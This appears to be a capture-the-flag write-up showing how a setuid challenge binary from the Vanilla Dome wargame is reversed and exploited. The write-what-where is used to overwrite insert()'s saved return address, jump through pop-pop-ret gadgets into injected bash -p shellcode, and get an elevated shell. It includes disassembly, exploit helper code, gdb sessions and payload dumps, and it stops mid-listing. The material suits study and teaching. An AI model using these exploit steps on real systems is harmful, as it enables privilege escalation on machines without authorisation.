Hello,
For today article, we're going to analyze and exploit a write-what-where with
ASLR, no PIE, full RELRO and stack cookie.
This is part of a set of challenges made by sm0k:
Vanilla Dome Wargame .
Let's begin.
The challenge
Before any reversing attempt, we need to launch the program to see what it does.
vanilla1@VanillaDome ~ $ ls -lash
total 76K
4.0K drwxr-xr-x 2 root root 4.0K Apr 29 14:15 .
4.0K drwxr-x--x 10 root root 4.0K May 15 20:52 ..
4.0K -rw-r--r-- 1 root root 127 Mar 23 05:56 .bash_logout
4.0K -rw-r--r-- 1 root root 193 Mar 23 05:56 .bash_profile
4.0K -rw-r--r-- 1 root root 3.9K Apr 29 15:47 .bashrc
44K -rw-r--r-- 1 root root 44K Apr 29 14:15 .gdbinit
8.0K -r-sr-sr-x 1 vanilla1crack vanilla1crack 6.7K Apr 29 12:28 Vanilla1
4.0K -r-------- 1 vanilla1crack vanilla1crack 19 Apr 29 12:28 key
vanilla1@VanillaDome ~ $ ./Vanilla1
Usage:./Vanilla1 <file>
vanilla1@VanillaDome ~ $ ./Vanilla1 key
vanilla1@VanillaDome ~ $ python -c 'print "a" * 1024' > /tmp/file.txt
vanilla1@VanillaDome ~ $ ./Vanilla1 /tmp/file.txt
Ok, it basically read some file and do stuffs with it ...
Let's reverse it
Opening GDB and disassembling main we get the following:
Dump of assembler code for function main:
0x08048578 <+0>: push ebp
0x08048579 <+1>: mov ebp,esp
0x0804857b <+3>: and esp,0xfffffff0 ; alignment
0x0804857e <+6>: sub esp,0x1050 ; there is a HUGE buffer and we have ebp = esp + 0x1050
0x08048584 <+12>: mov eax,DWORD PTR [ebp+0x8] ; argc
0x08048587 <+15>: mov DWORD PTR [esp+0x1c],eax ; n_arg = argc
0x0804858b <+19>: mov eax,DWORD PTR [ebp+0xc] ; argv
0x0804858e <+22>: mov DWORD PTR [esp+0x18],eax ; args = argv
0x08048592 <+26>: mov eax,gs:0x14 ; eax = stack cookie
0x08048598 <+32>: mov DWORD PTR [esp+0x104c],eax ; stack cookie (stored in gs:0x14)
0x0804859f <+39>: xor eax,eax
0x080485a1 <+41>: cmp DWORD PTR [esp+0x1c],0x1 ; if (n_arg <= 1) then error
0x080485a6 <+46>: jg 0x80485c4 <main+76> ; else continue
0x080485a8 <+48>: mov eax,DWORD PTR [esp+0x18] ; args ptr
0x080485ac <+52>: mov edx,DWORD PTR [eax] ; program name
0x080485ae <+54>: mov eax,0x8048790 ; format = "\t Usage:%s <file>\n"
; printf ("\t Usage:%s <file>\n", argv[0]);
0x080485b3 <+59>: mov DWORD PTR [esp+0x4],edx
0x080485b7 <+63>: mov DWORD PTR [esp],eax
0x080485ba <+66>: call 0x8048434 <printf@plt>
0x080485bf <+71>: jmp 0x80486a9 <main+305> ; bye
; memset (esp+0x38, 0x0, 0x1000);
0x080485c4 <+76>: mov DWORD PTR [esp+0x34],0x0 ; fp = NULL;
0x080485cc <+84>: mov DWORD PTR [esp+0x8],0x1000
0x080485d4 <+92>: mov DWORD PTR [esp+0x4],0x0
0x080485dc <+100>: lea eax,[esp+0x38]
0x080485e0 <+104>: mov DWORD PTR [esp],eax
0x080485e3 <+107>: call 0x80483f4 <memset@plt>
; fp = fopen (argv[1], "r");
0x080485e8 <+112>: mov edx,0x80487a3 ; "r"
0x080485ed <+117>: mov eax,DWORD PTR [esp+0x18] ; args
0x080485f1 <+121>: add eax,0x4
0x080485f4 <+124>: mov eax,DWORD PTR [eax] ; eax = args[1];
0x080485f6 <+126>: mov DWORD PTR [esp+0x4],edx
0x080485fa <+130>: mov DWORD PTR [esp],eax
0x080485fd <+133>: call 0x8048424 <fopen@plt>
0x08048602 <+138>: mov DWORD PTR [esp+0x34],eax
0x08048606 <+142>: cmp DWORD PTR [esp+0x34],0x0 ; if (fp == NULL) then error
0x0804860b <+147>: je 0x80486a9 <main+305>
0x08048611 <+153>: jmp 0x8048682 <main+266> ; else fgets
; value1 = atoll (buffer);
0x08048613 <+155>: lea eax,[esp+0x1038] ; this is a small buffer (ebp-0x1050+0x1038 = ebp-0x18)
0x0804861a <+162>: mov DWORD PTR [esp],eax
0x0804861d <+165>: call 0x8048414 <atoll@plt>
0x08048622 <+170>: mov DWORD PTR [esp+0x30],eax
; fgets (sbuffer, 0x14, fp);
0x08048626 <+174>: mov eax,DWORD PTR [esp+0x34] ; eax = fp
0x0804862a <+178>: mov DWORD PTR [esp+0x8],eax
0x0804862e <+182>: mov DWORD PTR [esp+0x4],0x14
0x08048636 <+190>: lea eax,[esp+0x1038] ; sbuffer
0x0804863d <+197>: mov DWORD PTR [esp],eax
0x08048640 <+200>: call 0x80483e4 <fgets@plt>
; value2 = atoll(sbuffer);
0x08048645 <+205>: lea eax,[esp+0x1038]
0x0804864c <+212>: mov DWORD PTR [esp],eax
0x0804864f <+215>: call 0x8048414 <atoll@plt>
0x08048654 <+220>: mov DWORD PTR [esp+0x2c],eax
0x08048658 <+224>: cmp DWORD PTR [esp+0x30],0x0 ; if (value1 == 0) then fgets
0x0804865d <+229>: je 0x8048682 <main+266>
0x0804865f <+231>: cmp DWORD PTR [esp+0x2c],0x0 ; if (value2 == 0) then fgets
0x08048664 <+236>: je 0x8048682 <main+266>
; insert (value2, value1, esp+0x38);
0x08048666 <+238>: lea eax,[esp+0x38]
0x0804866a <+242>: mov DWORD PTR [esp+0x8],eax
0x0804866e <+246>: mov eax,DWORD PTR [esp+0x30] ; eax = value1
0x08048672 <+250>: mov DWORD PTR [esp+0x4],eax
0x08048676 <+254>: mov eax,DWORD PTR [esp+0x2c] ; eax = value2
0x0804867a <+258>: mov DWORD PTR [esp],eax
0x0804867d <+261>: call 0x8048534 <insert>
; fgets (buffer, 0x14, fp);
0x08048682 <+266>: mov eax,DWORD PTR [esp+0x34] ; eax = fp
0x08048686 <+270>: mov DWORD PTR [esp+0x8],eax
0x0804868a <+274>: mov DWORD PTR [esp+0x4],0x14
0x08048692 <+282>: lea eax,[esp+0x1038] ; buffer
0x08048699 <+289>: mov DWORD PTR [esp],eax
0x0804869c <+292>: call 0x80483e4 <fgets@plt>
0x080486a1 <+297>: test eax,eax ; if (still data) then loop
0x080486a3 <+299>: jne 0x8048613 <main+155>
; check cookie
0x080486a9 <+305>: mov eax,0x0
0x080486ae <+310>: mov edx,DWORD PTR [esp+0x104c] ; stack cookie
0x080486b5 <+317>: xor edx,DWORD PTR gs:0x14
0x080486bc <+324>: je 0x80486c3 <main+331>
0x080486be <+326>: call 0x8048444 <__stack_chk_fail@plt>
0x080486c3 <+331>: leave
0x080486c4 <+332>: ret
End of assembler dump.
We basically have a main() which read the file with fgets() and use atoll()
in an insert function.
We can reconstruct the stack also. We can see in the code that ESP is used but
it is not convenient for calculating sizes.
We get the following stack values in the end for main():
esp+0x2c <-> ebp-0x1050+0x2c-0x8 = ebp-0x102c ; value2
esp+0x30 <-> ebp-0x1050+0x30-0x8 = ebp-0x1028 ; value1
esp+0x34 <-> ebp-0x1050+0x34-0x8 = ebp-0x1024 ; fp
esp+0x38 <-> ebp-0x1050+0x38-0x8 = ebp-0x1020 ; buffer (0x1000 = 4096 bytes)
esp+0x1038 <-> ebp-0x1050+0x1038-0x8 = ebp-0x20 ; sbuffer (0x14 = 20 bytes)
esp+0x104c <-> ebp-0x1050+0x104c-0x8 = ebp-0xc ; stack cookie
Don't forget -0x8 which correspond to seip and sebp ;).
sbuffer is a temporary buffer which is used by fgets().
value1 and value2 are integers converted from sbuffer through atoll().
fp is the file pointer used for referencing the file.
Having all the values, we can reconstruct the stack properly:
STACK TOP = LOW ADDRESSES
esp | arg0
esp+0x4 | arg1
^ esp+0x8 | arg2 |
| ebp-0x102c | value2 |
| ebp-0x1028 | value1 |
PUSH | ebp-0x1024 | fp | POP
| ebp-0x1020 | buffer |
| ..... |
| ebp-0x20 | end buffer |
| ebp-0x20 | sbuffer V
ebp-0xc | stack cookie
ebp | sebp
ebp+0x4-blog | seip
ebp+0x8 | argc
ebp+0xc | argv
STACK BOTTOM = HIGH ADDRESSES
Following the ASM, the main should look something like this:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main (int argc, char *argv[])
{
int value1, value2;
FILE *fp;
char buffer[4096], sbuffer[20];
if (argc <= 1) {
printf ("\t Usage:%s <file>\n", argv[0]);
return 0;
}
memset (buffer, 0, 0x1000);
fp = fopen (argv[1], "r");
if (fp == NULL)
return 0;
while (fgets (sbuffer, 0x14, fp) != NULL) {
value1 = atoll (sbuffer);
fgets (sbuffer, 0x14, fp);
value2 = atoll (sbuffer);
if (value1 != 0 && value2 != 0)
insert (value2, value1, buffer);
}
return 0;
}
The file is basically structured as a sequence of string values:
value1 | value2 | value1 | value2 | .... | value1 | value2
Don't forget that atoll() only convert leading characters [0-9]+ to an integer,
any following characters that are not numbers are not converted.
Now onto insert reversing:
Dump of assembler code for function insert:
0x08048534 <+0>: push ebp
0x08048535 <+1>: mov ebp,esp
0x08048537 <+3>: sub esp,0x28
0x0804853a <+6>: mov eax,DWORD PTR [ebp+0x8] ; eax = value2
0x0804853d <+9>: mov DWORD PTR [ebp-0x1c],eax
0x08048540 <+12>: mov eax,DWORD PTR [ebp+0xc] ; eax = value1
0x08048543 <+15>: mov DWORD PTR [ebp-0x20],eax
0x08048546 <+18>: mov eax,DWORD PTR [ebp+0x10] ; eax = buffer
0x08048549 <+21>: mov DWORD PTR [ebp-0x24],eax
0x0804854c <+24>: mov eax,gs:0x14 ; stack cookie
0x08048552 <+30>: mov DWORD PTR [ebp-0xc],eax
0x08048555 <+33>: xor eax,eax
0x08048557 <+35>: mov eax,DWORD PTR [ebp-0x1c]
0x0804855a <+38>: shl eax,0x2 ; value2 <<= 2;
0x0804855d <+41>: add eax,DWORD PTR [ebp-0x24] ; value2 += buffer;
0x08048560 <+44>: mov edx,DWORD PTR [ebp-0x20]
0x08048563 <+47>: mov DWORD PTR [eax],edx ; *value2 = value1;
; stack cookie check
0x08048565 <+49>: mov eax,DWORD PTR [ebp-0xc] ; stack cookie
0x08048568 <+52>: xor eax,DWORD PTR gs:0x14
0x0804856f <+59>: je 0x8048576 <insert+66>
0x08048571 <+61>: call 0x8048444 <__stack_chk_fail@plt>
0x08048576 <+66>: leave
0x08048577 <+67>: ret
End of assembler dump.
We thus have the following stack for insert():
STACK TOP = LOW ADDRESSES
esp
^ ebp-0x24 | buffer |
| ebp-0x20 | value1 |
PUSH | ebp-0x1c | value2 | POP
| ebp-0xc | stack cookie V
ebp | sebp
ebp+0x4 | seip
ebp+0x8 | offset
ebp+0xc | value
ebp+0x10 | buffer
STACK BOTTOM = HIGH ADDRESSES
The interesting code is between 0x804855a and 0x8048563, the rest is mostly
setting up stuffs.
From this code we can infer that:
- buffer is in fact an array of integers (due to shl eax, 0x2 which is equal to x4)
- value2 is an offset
- value1 is a value to insert
- no return as eax value is not properly re-initialized
So it is equivalent to the following code:
void insert (int offset, int value, int *array)
{
array[offset] = value;
}
So we can basically write an arbitrary value anywhere we want: a so called
"write-what-where".
This basically allow us to easily bypass the stack cookie.
Time for exploitation.
Exploiting a write-what-where
We first need to know what to write, there are multiple possibilities:
- SEIP (return to code)
- SEBP (then craft a fake stack frame and all necessary stuffs)
- atexit destructors
- DYNAMIC FINI
- GOT entry
- etc
Since this is a write-what-where and we want a reliable exploit, the
__stack_chk_fail GOT entry would have been a nice target.
Unlucky for us: RELRO so no way.
We will target a stack address as the buffer address is on the stack and we
control an offset. It will be more reliable than targeting an address in the
binary (stack randomization could make the offset change between 0x804.... and
stack addresses). SEIP is the obvious candidate here.
Since we would like to trigger our payload as soon as possible, insert() SEIP
is the target.
Second condition: we need a place for our shellcode!
We'll "simply" inject it through our "integers array". There is plenty of room
(0x1000 = 4096 bytes!).
Secondly, good news: no NX, so no need for ROP here.
Given that our shellcode is around 22-50 bytes, we get at least 4000 NOPs for
our NOPsled.
Ok, now we have the theory, let's resolve that challenge!
Exploitation
In our previous section, our exploit reflexion was as follow:
- fill integer array with shellcode
- activate payload by overwriting insert() SEIP
The following snippets of code is in charge of filling the array:
int get_fsize (FILE *fp)
{
int sz_file;
int old_offset;
old_offset = ftell (fp);
fseek (fp, 0, SEEK_END);
sz_file = ftell (fp);
fseek (fp, old_offset, SEEK_SET);
return sz_file;
}
// integer to ascii
char *i2a (uint32_t value)
{
char *intstr;
int len_intstr;
intstr = calloc (21, sizeof(*intstr));
memset (intstr, 'a', 19);
snprintf (intstr, 19, "%d", value);
len_intstr = strlen (intstr);
if (intstr > 0)
intstr[len_intstr] = 'a';
return intstr;
}
struct dpatch_t *fill_array (struct dpatch_t *array, int n_elts, FILE *fp)
{
// buffer
char *buffer;
// loop
int idx_array, idx_buffer;
int sz_file;
int rest;
sz_file = get_fsize (fp);
rest = sz_file % 4;
// alloc buffer
buffer = calloc (sz_file + (rest != 0 ? 4 : 0), sizeof(*buffer));
if (!buffer)
return NULL;
// read
fseek (fp, 0, SEEK_SET);
fread (buffer, sz_file, 1, fp);
// construct array
for (idx_array = 0, idx_buffer = 0; idx_array < n_elts - 1; idx_array++, idx_buffer++) {
array[idx_array].value = i2a (*((uint32_t *) buffer + idx_buffer));
array[idx_array].offset = i2a (idx_buffer);
}
free (buffer);
return array;
}
Now we need to activate our payload through the vulnerability trigger.
We need to compute our insert() SEIP offset.
ESP (insert) = ESP (main) - 0x4 (SEIP offset) - 0x4 (SEBP offset) - 0x28
= EBP (main) - 0x1050 - 0x4 - 0x4 - 0x28
= EBP (main) - 0x1080
EBP (insert) = ESP (main) - 0x4 (SEIP offset) - 0x4 (SEBP offset)
= EBP (main) - 0x1050 - 0x4 - 0x4
= EBP (main) - 0x1058
seip (insert) = buffer - (EBP (insert) + 0x4)
= (EBP (main) - 0x1020) - (EBP (main) - 0x1058 + 0x4)
= 0x3c
Ok, we got 0x3c (60) bytes upper on the stack and lower in memory.
So we basically are going to create an underflow.
Since there seems to be only unsigned integers but multiplied by 0x4. We need
to have "real" value:
3c = 15 * 4
Ok we got our offset, what about our value to insert?
We can avoid guessing the 4 bytes of the address.
We can do that by overwriting only 2 last bytes of insert() SEIP (it would
thus junk 2 bytes afterward but we don't really care about those).
Since we multiply by 4, this technique is not possible (it has to be a
multiple of 4).
There is an actual better solution.
Remember our insert() stack?
STACK TOP = LOW ADDRESSES
esp
^ ebp-0x24 | buffer |
| ebp-0x20 | value1 |
PUSH | ebp-0x1c | value2 | POP
| ebp-0xc | stack cookie V
ebp | sebp
ebp+0x4 | seip
ebp+0x8 | offset
ebp+0xc | value
ebp+0x10 | buffer
STACK BOTTOM = HIGH ADDRESSES
We have buffer address laying on the stack!
We may be able to reuse it :).
Let's check:
We're going to break on:
- 0x0804867d <main+261> : call 0x8048534 <insert>
- 0x08048577 <insert+67>: ret
gdb$ b *0x0804867d
gdb$ b *0x08048577
gdb$ r /tmp/test.txt
--------------------------------------------------------------------------[regs]
EAX: FFFFFFF1 EBX: 9CB15E54 ECX: 00000001 EDX: FFFFFFFF o d I t S z a p c
ESI: 00000000 EDI: 00000000 EBP: B3D36E58 ESP: B3D35E00 EIP: 0804867D
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
[007B:B3D35E00]----------------------------------------------------------[stack]
B3D35E50 : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
B3D35E40 : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
B3D35E30 : 00 E8 76 48 C8 61 05 08 - 00 00 00 00 00 00 00 00 ..vH.a..........
B3D35E20 : 00 00 00 00 00 00 00 00 - 00 00 00 00 F1 FF FF FF ................
B3D35E10 : 00 00 00 00 00 00 00 00 - 04 6F D3 B3 02 00 00 00 .........o......
B3D35E00 : F1 FF FF FF 00 E8 76 48 - 38 5E D3 B3 00 00 00 00 ......vH8^......
[007B:B3D35E00]-----------------------------------------------------------[data]
B3D35E00 : F1 FF FF FF 00 E8 76 48 - 38 5E D3 B3 00 00 00 00 ......vH8^......
B3D35E10 : 00 00 00 00 00 00 00 00 - 04 6F D3 B3 02 00 00 00 .........o......
B3D35E20 : 00 00 00 00 00 00 00 00 - 00 00 00 00 F1 FF FF FF ................
B3D35E30 : 00 E8 76 48 C8 61 05 08 - 00 00 00 00 00 00 00 00 ..vH.a..........
B3D35E40 : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
B3D35E50 : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
B3D35E60 : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
B3D35E70 : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
[0073:0804867D]-----------------------------------------------------------[code]
=> 0x804867d <main+261>: call 0x8048534 <insert>
0x8048682 <main+266>: mov eax,DWORD PTR [esp+0x34]
0x8048686 <main+270>: mov DWORD PTR [esp+0x8],eax
0x804868a <main+274>: mov DWORD PTR [esp+0x4],0x14
0x8048692 <main+282>: lea eax,[esp+0x1038]
0x8048699 <main+289>: mov DWORD PTR [esp],eax
0x804869c <main+292>: call 0x80483e4 <fgets@plt>
0x80486a1 <main+297>: test eax,eax
--------------------------------------------------------------------------------
Breakpoint 1, 0x0804867d in main ()
gdb$ gdb$ p/x $ebp-0x1020
$1 = 0xb3d35e38
gdb$ c
--------------------------------------------------------------------------[regs]
EAX: 00000000 EBX: 9CB15E54 ECX: 00000001 EDX: 4876E800 o d I t s Z a P c
ESI: 00000000 EDI: 00000000 EBP: B3D36E58 ESP: B3D35DFC EIP: 08048577
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
[007B:B3D35DFC]----------------------------------------------------------[stack]
B3D35E4C : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
B3D35E3C : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
B3D35E2C : F1 FF FF FF 00 E8 76 48 - C8 61 05 08 00 00 00 00 ......vH.a......
B3D35E1C : 02 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
B3D35E0C : 00 00 00 00 00 00 00 00 - 00 00 00 00 04 6F D3 B3 .............o..
B3D35DFC : 00 E8 76 48 F1 FF FF FF - 00 E8 76 48 38 5E D3 B3 ..vH......vH8^..
[007B:B3D35DFC]-----------------------------------------------------------[data]
B3D35DFC : 00 E8 76 48 F1 FF FF FF - 00 E8 76 48 38 5E D3 B3 ..vH......vH8^..
B3D35E0C : 00 00 00 00 00 00 00 00 - 00 00 00 00 04 6F D3 B3 .............o..
B3D35E1C : 02 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
B3D35E2C : F1 FF FF FF 00 E8 76 48 - C8 61 05 08 00 00 00 00 ......vH.a......
B3D35E3C : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
B3D35E4C : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
B3D35E5C : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
B3D35E6C : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
[0073:08048577]-----------------------------------------------------------[code]
=> 0x8048577 <insert+67>: ret
0x8048578 <main>: push ebp
0x8048579 <main+1>: mov ebp,esp
0x804857b <main+3>: and esp,0xfffffff0
0x804857e <main+6>: sub esp,0x1050
0x8048584 <main+12>: mov eax,DWORD PTR [ebp+0x8]
0x8048587 <main+15>: mov DWORD PTR [esp+0x1c],eax
0x804858b <main+19>: mov eax,DWORD PTR [ebp+0xc]
--------------------------------------------------------------------------------
Breakpoint 2, 0x08048577 in insert ()
gdb$ x/10wx $esp
0xb3d35dfc: 0x08048767 0xfffffff1 0x08048767 0xb3d35e38
0xb3d35e0c: 0x00000000 0x00000000 0x00000000 0xb3d36f04
0xb3d35e1c: 0x00000002 0x00000000
0x08048767 is our rewritten SEIP :).
0xfffffff1 is -15
0x08048767 the value we gave
0xb3d35e38 is our buffer value
0xb3d36f04 point to env[]
Ok, great, we have a pointer to our buffer.
We now need an instruction of style pop pop ret.
Exploitation POP-POP-RET style
First, we need our pop-pop-ret.
$ objdump -d ./Vanilla1
...
8048767: 5b pop %ebx
8048768: 5d pop %ebp
8048769: c3 ret
...
Here we go.
The trigger is thus done this way:
// fill array with shellcode
fill_array (array, n_elts, fp_in);
// set trigger
array[n_elts-1].value = i2a (0x8048767);
array[n_elts-1].offset = i2a(-15);
0x8048767 is the address to the pop-pop-ret.
-15 is the offset to SEIP.
Now we should have everything we need for reliable exploitation.
Let's try our sploit.
m101@m101-laptop:~/challenges/vanilla_dome$ ./exploit1.rev1 bash-p.bin payload.bin
sz_file = 33
rest = 1
n_elts = 9
2d 31 37 32 32 32 38 33 31 35 38 61 61 61 61 61 61 61 61 | -1722283158aaaaaaaa
30 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 0aaaaaaaaaaaaaaaaaa
37 36 31 38 31 36 36 35 38 61 61 61 61 61 61 61 61 61 61 | 761816658aaaaaaaaaa
31 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 1aaaaaaaaaaaaaaaaaa
31 33 39 30 35 31 32 34 39 36 61 61 61 61 61 61 61 61 61 | 1390512496aaaaaaaaa
32 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 2aaaaaaaaaaaaaaaaaa
37 39 35 33 37 31 36 32 36 61 61 61 61 61 61 61 61 61 61 | 795371626aaaaaaaaaa
33 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 3aaaaaaaaaaaaaaaaaa
31 37 35 32 33 39 32 30 33 34 61 61 61 61 61 61 61 61 61 | 1752392034aaaaaaaaa
34 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 4aaaaaaaaaaaaaaaaaa
31 38 35 32 34 30 30 31 37 35 61 61 61 61 61 61 61 61 61 | 1852400175aaaaaaaaa
35 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 5aaaaaaaaaaaaaaaaaa
31 33 36 34 33 38 36 36 39 37 61 61 61 61 61 61 61 61 61 | 1364386697aaaaaaaaa
36 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 6aaaaaaaaaaaaaaaaaa
2d 38 34 30 38 35 37 32 36 31 61 61 61 61 61 61 61 61 61 | -840857261aaaaaaaaa
37 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 7aaaaaaaaaaaaaaaaaa
31 32 38 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 128aaaaaaaaaaaaaaaa
38 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 8aaaaaaaaaaaaaaaaaa
31 33 34 35 31 34 35 33 35 61 61 61 61 61 61 61 61 61 61 | 134514535aaaaaaaaaa
2d 31 35 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | -15aaaaaaaaaaaaaaaa
On the remote machine:
vanilla1@VanillaDome /tmp $ ~/Vanilla1 v1.1.txt
Segmentation fault
Woot! It doesn't work!
Let's check the stack.
gdb$ b *0x08048577
Breakpoint 1 at 0x8048577
gdb$ condition 1 $edx==0x8048767
gdb$ r payload.bin
We break as soon as edx == 0x8048577 (which is our last value).
gdb$ x/10wx $esp
0xb3d35dfc: 0x08048767 0xfffffff1 0x08048767 0xb3d35e38
0xb3d35e0c: 0x00000000 0x00000000 0x00000000 0xb3d36f04
0xb3d35e1c: 0x00000002 0x00000000
gdb$ x/10wx 0xb3d35e38
0xb3d35e38: 0x00000000 0x2d686652 0x52e18970 0x2f68686a
0xb3d35e48: 0x68736162 0x6e69622f 0x5152e389 0xcde18953
0xb3d35e38: 0x00000080 0x00000000
Whoops, the first 4 bytes are never written.
That's explained by the fact that insert() isn't called if atoll() return 0.
We can fix it through 2 methods:
- put our payload somewhere else in the stack
- use arithmetic tricks
Putting our payload somewhere else
Remember about 0xb3d36f04 ?
This is our env[] pointer.
We need an address in stack to use the same trick as before with the pop-pop-ret.
gdb$ x/10wx 0xb3d36f04
0xb3d36f04: 0xbd4dea72 0xbd4dea8a 0x00000000 0xbd4dea93
0xb3d36f14: 0xbd4deb25 0xbd4deb35 0xbd4deb40 0xbd4deb64
0xb3d36f24: 0xbd4deb77 0xbd4deb85
If you check each pointers:
gdb$ x/s 0xbd4dea72
0xbd4dea72: "/home/vanilla1/Vanilla1"
gdb$ x/s 0xbd4dea8a
0xbd4dea8a: "payload.bin"
gdb$ x/s 0xbd4deb64
0xbd4deb64: "SSH_TTY=/dev/pts/0"
You get environment values.
We can trash those pointers, we don't really need them (our shell won't be happy
but it'll still work).
In order to overwrite those pointers, we need our offset:
0xb3d36f04 - 0xb3d35e38 = 0x10CC = 4300
And we need to pop 6 values out of the stack.
For that, I chose 2 gadgets chained together:
0x08048735: pop ebx ; pop esi ; pop edi ; pop ebp ; ret ; (1 found)
0x08048503: pop ebp ; ret ; (1 found)
Your stack will look like this when the trigger is set up:
gdb$ x/10wx $esp
0xb3d35dfc: 0x08048735 0xfffffff1 0x08048735 0xb3d35e38
0xb3d35e0c: 0x00000000 0x08048503 0x00000000 0xb3d36f04
0xb3d35e1c: 0x00000002 0x00000000
It will return directly to 0xb3d36f04 and gain code execution.
Let's try:
m101@m101-laptop:~/challenges/vanilla_dome$ ./exploit1.rev2 bash-p.bin v1.2txt
sz_file = 33
rest = 1
n_elts = 9
6a 0b 58 99 | j.X.
52 66 68 2d | Rfh-
70 89 e1 52 | p..R
6a 68 68 2f | jhh/
62 61 73 68 | bash
2f 62 69 6e | /bin
89 e3 52 51 | ..RQ
53 89 e1 cd | S...
80 00 00 00 | ....
2d 31 37 32 32 32 38 33 31 35 38 61 61 61 61 61 61 61 61 | -1722283158aaaaaaaa
31 30 37 35 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 1075aaaaaaaaaaaaaaa
37 36 31 38 31 36 36 35 38 61 61 61 61 61 61 61 61 61 61 | 761816658aaaaaaaaaa
31 30 37 36 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 1076aaaaaaaaaaaaaaa
31 33 39 30 35 31 32 34 39 36 61 61 61 61 61 61 61 61 61 | 1390512496aaaaaaaaa
31 30 37 37 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 1077aaaaaaaaaaaaaaa
37 39 35 33 37 31 36 32 36 61 61 61 61 61 61 61 61 61 61 | 795371626aaaaaaaaaa
31 30 37 38 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 1078aaaaaaaaaaaaaaa
31 37 35 32 33 39 32 30 33 34 61 61 61 61 61 61 61 61 61 | 1752392034aaaaaaaaa
31 30 37 39 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 1079aaaaaaaaaaaaaaa
31 38 35 32 34 30 30 31 37 35 61 61 61 61 61 61 61 61 61 | 1852400175aaaaaaaaa
31 30 38 30 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 1080aaaaaaaaaaaaaaa
31 33 36 34 33 38 36 36 39 37 61 61 61 61 61 61 61 61 61 | 1364386697aaaaaaaaa
31 30 38 31 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 1081aaaaaaaaaaaaaaa
2d 38 34 30 38 35 37 32 36 31 61 61 61 61 61 61 61 61 61 | -840857261aaaaaaaaa
31 30 38 32 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 1082aaaaaaaaaaaaaaa
31 32 38 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 128aaaaaaaaaaaaaaaa
31 30 38 33 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 1083aaaaaaaaaaaaaaa
31 33 34 35 31 33 39 32 33 61 61 61 61 61 61 61 61 61 61 | 134513923aaaaaaaaaa
2d 31 30 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | -10aaaaaaaaaaaaaaaa
31 33 34 35 31 34 34 38 35 61 61 61 61 61 61 61 61 61 61 | 134514485aaaaaaaaaa
2d 31 35 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | -15aaaaaaaaaaaaaaaa
On the challenge machine:
vanilla1@VanillaDome /tmp $ ~/Vanilla1 v1.2.txt
bash-4.1$ id
uid=1014(vanilla1) gid=1015(vanilla1) euid=1008(vanilla1crack) egid=1009(vanilla1crack) groups=1009(vanilla1crack),1015(vanilla1)
bash-4.1$ pwd
/tmp
bash-4.1$ cd
bash: cd: HOME not set
bash-4.1$ cd ~
bash-4.1$ pwd
/home/vanilla1
Just so you don't bang your header, use
bash -p payload or you won't get the suid.
Pawn!
I wanted it to be a bit cleaner.
Trashing the env[], not cool.
Let's try bypassing that 0 restriction through arithmetic tricks.
Arithmetic trick
For the careful reader, you may have spotted some interesting line in insert()
code.
If not:
Dump of assembler code for function insert:
0x08048534 <+0>: push ebp
0x08048535 <+1>: mov ebp,esp
0x08048537 <+3>: sub esp,0x28
0x0804853a <+6>: mov eax,DWORD PTR [ebp+0x8] ; eax = value2
0x0804853d <+9>: mov DWORD PTR [ebp-0x1c],eax
0x08048540 <+12>: mov eax,DWORD PTR [ebp+0xc] ; eax = value1
0x08048543 <+15>: mov DWORD PTR [ebp-0x20],eax
0x08048546 <+18>: mov eax,DWORD PTR [ebp+0x10] ; eax = buffer
0x08048549 <+21>: mov DWORD PTR [ebp-0x24],eax
0x0804854c <+24>: mov eax,gs:0x14 ; stack cookie
0x08048552 <+30>: mov DWORD PTR [ebp-0xc],eax
0x08048555 <+33>: xor eax,eax
0x08048557 <+35>: mov eax,DWORD PTR [ebp-0x1c]
0x0804855a <+38>: shl eax,0x2 ; value2 <<= 2;
0x0804855d <+41>: add eax,DWORD PTR [ebp-0x24] ; value2 += buffer;
0x08048560 <+44>: mov edx,DWORD PTR [ebp-0x20]
